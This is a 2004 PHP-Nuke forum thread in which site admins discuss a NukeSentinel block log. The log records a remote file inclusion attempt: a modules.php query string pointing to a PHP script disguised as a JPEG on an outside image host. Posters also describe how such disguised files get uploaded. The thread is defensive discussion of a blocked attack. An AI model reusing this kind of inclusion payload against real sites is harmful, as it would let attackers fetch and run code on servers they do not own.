Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™
Author Message
Deseroka
Client


Joined: Apr 15, 2003
Posts: 466
Location: FL

PostPosted: Fri Oct 15, 2004 12:51 pm Reply with quote

Agent Inspector tells me there is not an obvious match for this, so thought I should post it here as requested.
Quote:
Date & Time: 2004-10-15 09:28:25
Blocked IP: 194.87.13.8
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: none
Query String: redwebz.org:80/modules.php?name=http://img91.exs.cx/img91/9747/test3.jpg?
Forwarded For: none
Client IP: none
Remote Address: 194.87.13.8
Remote Port: 50438
Request Method: GET
 
View user's profile Send private message
chatserv
Member Emeritus


Joined: May 02, 2003
Posts: 1389
Location: Puerto Rico

PostPosted: Fri Oct 15, 2004 12:58 pm Reply with quote

That is not an agent, someone was trying to run a remote script on your site.
 
View user's profile Send private message Visit poster's website
Deseroka
PostPosted: Fri Oct 15, 2004 1:22 pm Reply with quote

Thanks for clarifyiing for me Chat...
 
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17077

PostPosted: Fri Oct 15, 2004 1:38 pm Reply with quote

I have gotten several of thos this morning also. NukeSentinel stopped them dead Smile
 
View user's profile Send private message
Deseroka
PostPosted: Fri Oct 15, 2004 2:15 pm Reply with quote

I had another also, both from RIPE. Sentinel stopped them in their tracks.
 
Deseroka
PostPosted: Mon Oct 18, 2004 7:24 am Reply with quote

I also meant to mention that when Sentinel blocked this, it gave filter as the reason...dunno if that means anything, but figured I would tell ya....
 
Raven
PostPosted: Mon Oct 18, 2004 7:25 am Reply with quote

It should. It 'filtered' the URL
 
oprime2001
Worker
Worker


Joined: Jun 04, 2004
Posts: 119
Location: Chicago IL USA

PostPosted: Mon Oct 18, 2004 10:15 am Reply with quote

I reported the php file disguised as a JPEG to IMAGESHACK.US and here was their response:
Quote:
This was deleted.

And another thing: you can't launch attacks from .jpg files.
Says them! I had multiple attempts on different websites using a file hosted by IMAGESHACK.US.

I just tested to see if IMAGESHACK.US had implemented a fix to prevent the disguise of txt/php files as JPEG files, but I was able to upload a regular text file whose extension I had simply changed to .JPG. Theoretically, can IMAGESHACK.US patch their systems to prevent the upload of non-JPEG files with JPEG extensions? If not, expect possible future attacks facilitated by IMAGESHACK.US.

On a somewhat unrelated note, there are Only registered users can see links on this board! Get registered or login!.
 
View user's profile Send private message
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©